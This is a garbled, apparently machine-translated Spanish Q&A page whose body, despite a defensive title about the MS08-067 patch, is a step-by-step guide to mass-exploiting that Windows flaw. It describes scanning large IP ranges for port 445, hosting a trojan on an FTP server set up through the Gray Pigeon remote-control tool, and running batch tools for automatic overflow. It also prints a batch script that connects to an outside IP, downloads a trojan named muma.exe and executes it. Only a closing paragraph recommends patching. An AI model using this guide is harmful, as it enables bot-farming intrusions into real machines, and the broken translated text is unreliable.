Red de conocimiento del abogados - Preguntas y respuestas sobre la Ley de patentes - ms08-67, ya descargué este parche, ¿por qué todavía me atacan?

ms08-67, ya descargué este parche, ¿por qué todavía me atacan?

Se puede decir que el desbordamiento de MS08-67 es una de las mayores vulnerabilidades que surgieron este año. Debido a su amplia cobertura, la escasa conciencia de los usuarios sobre la prevención y la intrusión relativamente simple, se ha convertido en la principal. Trampa preferida para muchos hackers. ¡Herramientas de pollo! Para los usuarios generales, hoy recomendamos algunos métodos simples de procesamiento por lotes para capturar rápidamente los pollos de engorde de Internet.

1. El desbordamiento de MS08-67 es completamente automático

Si no comprende la ventana del símbolo del sistema CMD y no está familiarizado con varias operaciones de comando, no funcionará. Varios comandos de procesamiento por lotes en la ventana del símbolo del sistema CMD a veces pueden ayudarnos a completar varias operaciones manuales complejas de manera conveniente. "MS08-67 Overflow Automatic" es una herramienta que utiliza procesamiento por lotes para escanear automáticamente hosts vulnerables, desbordamientos y cargar troyanos en ejecución. ¡Puede escanear automáticamente decenas de miles de direcciones IP en busca de ataques de desbordamiento!

1. Establece el segmento IP

Descarga la herramienta "MS08-67 Overflow Automatic", descomprímela y abre las carpetas "TXT" y "TXT2", y ***Allí Hay ocho archivos IP llamados "IP1.txt", "IP2.txt", etc. Después de abrir el archivo con el Bloc de notas, simplemente agregue el segmento de dirección a escanear. Simplemente coloque un segmento de IP en cada archivo y el rango del segmento de direcciones IP no debe ser demasiado largo; de lo contrario, la tasa de éxito no será alta. Generalmente, 50,000 direcciones IP en un segmento son suficientes.

2. Configure el servidor de carga

Después de abrir el archivo "down2.txt" con el Bloc de notas, puede ver que se trata de un código de comando por lotes para la carga automática FTP. Todo lo que tenemos que hacer es modificar la dirección del servidor FTP, el nombre de usuario y la contraseña de inicio de sesión y guardar el archivo modificado.

Muchos programas de control de troyanos tienen funciones de servicio FTP. Por ejemplo, en el troyano Gray Pigeon, abra la ventana de la herramienta del servidor FTP. Configure el directorio de inicio del servidor FTP en cualquier ruta en el disco duro del host local, configure el "Puerto de servicio" en 21 y luego establezca un nombre de usuario y contraseña. Después de la configuración, haga clic en el botón "Iniciar servicio". Tenga en cuenta que al crear su propio servidor FTP, debe tener una dirección IP pública; de lo contrario, no podrá conectarse al servidor FTP desde Internet para descargar y ejecutar troyanos.

Después de activar el servicio FTP, cambie el servidor FTP en el archivo "down2.txt" a su propia dirección IP e ingrese el nombre de usuario y la contraseña del servidor FTP que acaba de configurar.

3. Configure el programa del servidor

Primero realice varias operaciones en el troyano, como antivirus, y colóquelo en la ruta de la carpeta que acaba de configurar como directorio raíz del Servidor FTP. Luego cambie el "archivo abc.exe que desea descargar" en el archivo "down2.txt" por el nombre del archivo del caballo de Troya, cambie el otro "abc.exe" por el nombre del archivo del caballo de Troya y guarde. el archivo.

El último archivo "down2.txt" modificado es el siguiente:

echoopen220.172.228.177gt;cc1.dat

echoxiaoyaogt;gt;cc1.dat

echoxiaoyaogt ;gt;cc1.dat

echobinarygt;gt;cc1.dat

echogetmuma.exegt;gt;cc1.dat

echobyegt;gt;cc1. dat

ftp-s:cc1.dat

muma.exe

delcc1.dat

muma.exe

salir

Tenga en cuenta que se debe agregar un retorno de carro después de la última cadena de "salida" para salir automáticamente del estado de carga desbordada. 4. Desbordamiento de lotes

Ahora puedes iniciar el ataque de desbordamiento de lotes. Hay dos archivos por lotes "win2k.BAT" y "xp.bat" en el directorio de herramientas "MS08-67 Overflow Automatic", que se ejecutan en sistemas Windows 2000/2003 y sistemas Windows XP respectivamente. Dependiendo del tipo de sistema que esté utilizando, haga doble clic en el archivo por lotes correspondiente para iniciar el desbordamiento automático.

La herramienta de desbordamiento primero escaneará los hosts con el puerto 445 abierto en el segmento de dirección IP especificado, guardará la dirección IP del host vulnerable y luego cargará automáticamente el ataque del caballo de Troya de desbordamiento.

2. Desbordamiento por lotes MS08067

Ejecute la herramienta "445.exe" en la herramienta de desbordamiento por lotes para realizar un escaneo por lotes. La herramienta también es un programa de procesamiento por lotes en la línea de comando. Primero seleccione su tipo de sistema. Si es un host de WindowsXP, presione el número "1" para usar el modo de escaneo multiproceso TCP. presione el número "2", use el escaneo SYN.

Después de presionar las teclas numéricas, automáticamente se abrirá el archivo "IP.txt". Este archivo se utiliza para configurar el segmento de dirección IP que se va a escanear. Por ejemplo, aquí elige escanear el segmento de dirección IP "220.172.25.1-220.200.30.254", que puede admitir el escaneo de entrada de varias líneas. Después de configurar el segmento de dirección IP, guarde el archivo y cierre la ventana del Bloc de notas.

Regrese a la ventana adicional y presione cualquier tecla para comenzar a escanear automáticamente los hosts vulnerables. El programa llama al escáner S para realizar un escaneo por lotes. La velocidad de escaneo es muy rápida y los resultados del escaneo se guardarán en el archivo "Result.txt" en el directorio actual. Finalmente, el programa organizará automáticamente los resultados del escaneo y guardará todas las direcciones IP del host con el puerto 445 abierto como un archivo separado llamado "host.txt".

Una vez completado el análisis, ejecute "yichu.exe" para realizar automáticamente el desbordamiento por lotes.

Para la vulnerabilidad de desbordamiento MS08067, el autor cree que la mejor manera es instalar un parche. Aunque bloquear el puerto 445 también puede tener el mismo efecto, sigue siendo problemático para muchos entornos de aplicaciones. Además, si es necesario, también puedes utilizar un firewall para monitorear el puerto correspondiente.